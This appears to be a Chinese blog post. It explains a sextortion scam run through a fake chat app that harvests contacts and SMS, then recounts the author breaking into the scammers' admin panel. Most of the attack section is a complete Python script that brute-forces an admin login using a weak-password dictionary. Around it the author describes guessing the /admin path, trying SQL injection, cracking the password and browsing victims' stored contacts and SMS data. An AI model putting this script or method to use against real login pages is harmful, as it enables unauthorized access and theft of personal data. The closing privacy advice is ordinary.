为啥总是不通过啊 能把原因写的清楚点吗 或者是具体到那几行??
事情是这样的
前两天在某求职软件随便发了一条动态
过了一会就收到了一个女生发来的一条消息
聊了没几句就引导我加她QQ
大概是这个样子的
搜索了一下级别不是很高才一个太阳
空间里没有说说,相册
访问量也很低才两位数
一看就知道是小号
这些人聊天挺有套路的
前几天会和你正常聊天
在往后就会问你最近的感情状况怎么样
然后就他们就切入正题了
问你:"要不要来点刺激的?"
"bu chuan yi fu的那种聊天"
有些人可能处于某种状态就直接答应了
然后她就会给你发一个app的安装包
有的可能还会给你个邀请码什么的
放上几个吸引人的背景图
大概就像下面这样
登录的时候是要用手机号和邀请码登录
登录成功大概是这个样子
这些一看就知道肯定是假数据
根本不用信
进入软件时还会让你允许授权
获取手机通讯录, 相册, 短信等权限
不允许的话还不准使用
获取这些东西才是让你乖乖掏钱的利刃
然后重点来啦
好友那边会给你发几条"带颜色"的视频
用来诱导你"心潮澎湃"
然后会邀请你开视频
让你先露个脸
然后再让你拍某些私 密地方
这个时候有些人早就放飞自我了
也浑然不知即将到来的"灾难"
对方大概会在一分钟左右挂断视频
因为他的阴谋已经得逞了
过会你就会收到一些勒索消息
转过来多少多少钱
不然就把刚刚的那些视频发给你通讯录的所有人
这个时候大多数人应该会选择破财 ,消灾
也不会报_警
以免影响自己的声誉,面子
这些人正是抓住了人的这一特点加以"利用"使之成为赚钱的渠道
而这却是一个无底洞
由于他们获取到了你的短信信息
你的余额有些他们也能看到
直到把你余_额"榨干"才会罢休
出于好奇对该app进行了抓_包
获取到了请求的域名
根据域名猜测常用后台管理网址
一下就成功了
网址后面加个"admin"
例:www.xxx.com/admin
就像这样成功进到登录界面
试了几下sql注_,入发现没有效果
尝试了几个常见的弱密码之后也没有反应
就从网上找来了一堆弱密码集合
去重之后大概有1100多个密码
下图为部分密码
这个后台并没有验证码
爆_,破起来相对简单
然后就开始编写程序开始爆_,.破
程序大概代码是这样的
import requests, json, time, re
path = __file__
# 获取当前文件名用于生成日志
file_name = re.findall(r'[\.\\]?(\w+)\.py$', path)
if len(file_name):
file_name = file_name[0]
else:
file_name = 'null'
# 密码字典
f=open("dict.txt")
# 执行次数
c = 1;
# 空行次数
i = 1;
while 1:
pwd = f.readline().strip()
print('\n密码:', pwd, ' 尝试次数: ',c)
c = c+1
if not pwd:
print('字典已比对完',pwd)
i = i+1
if (i > 6):
break
# 接口地址 xxx换成指定域名
url = "https://www.xxx.com/admin/privilege.php?act=signin&type=password"
# 消息头数据
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Content-Length': '30',
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': 'PHPSESSID=2uj013123rsdfsdftmik62',
'Host': 'www.xxx.com',
'Origin': 'https://www.xxx.com',
'Referer': 'https://www.xxx.com/admin/privilege.php?act=signin&type=password',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36',
}
# 默认账号以及测试密码
payload = {
'username':'admin',
'password':pwd,
'dsc_token':'ca2ad6e8b7c89039c3370d314f2a32ba',
}
# 当前时间
this_time = '\n' + time.strftime("%Y-%m-%d %H:%M:%S" , time.localtime() ) + ' '
# verify = False 忽略SSH 验证
requests.packages.urllib3.disable_warnings()
try:
r = requests.post(url, payload, headers=headers,verify=False)
except Exception as e:
print('请求错误')
file_handle=open(file_name + 'response_error.txt',mode='a+',encoding='utf-8')
file_handle.write(this_time + ' 请求错误 请求的密码是: ' + pwd )
file_handle.close();
print(e)
time.sleep(1)
continue;
# code码
code = r.status_code
# print(code)
if (code != 200):
print('响应错误')
file_handle=open(file_name + 'request_log.txt',mode='a+',encoding='utf-8')
file_handle.write(this_time + ' 响应错误 密码是: ' + pwd )
file_handle.close();
continue;
# print(r.text)
response_content = r.text
# result = re.findall('false', response_content)
# if len(result):
if response_content == 'false':
print('error 密码错误')
else:
print('破解成功,密码为',pwd, '\n')
file_handle=open(file_name + 'request_log.txt',mode='a+',encoding='utf-8')
file_handle.write( this_time + ' 密码是: ' + pwd)
file_handle.close();
break
time.sleep(1)由于主要是为了实现功能+对Python不熟悉
对代码的可读性,方法封装未做处理请各位理解^_^
经过几十分钟的调试终于可以运行了
运行结果大概是这个样子的
等了几分钟破_,解了大概1000多次后
成功找到密码为: rty456, 账号是: admin
用的是默认的账号
然后在登录界面把账号和刚刚的密码输上去点了一下登录
成功进入到后台
后台功能比较简单
主要有用户手机号以及用户的通讯录和短信信息
可以提供下载
这样就有可能能窃_取,短信信息以及银行卡信息了
这些用户都是在好奇心的驱使下一步一步掉进陷阱
仅仅一天就有将近20人上钩
这个网站刚刚成立十几天就已经有几百人被坑
这点相对于整个互联网还只是冰山一角不值一提
但却时刻影响着我们的隐私安全
在平时使用手机或电脑时
尽量不访问未知网站,不安装来源信息不明的软件
软件获取授权信息时要仔细斟酌
尽量把应用权限控制到最小
隐_私-照片,音频,视频可以进行加密处理减少外泄的可能性
扫一扫
1146
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
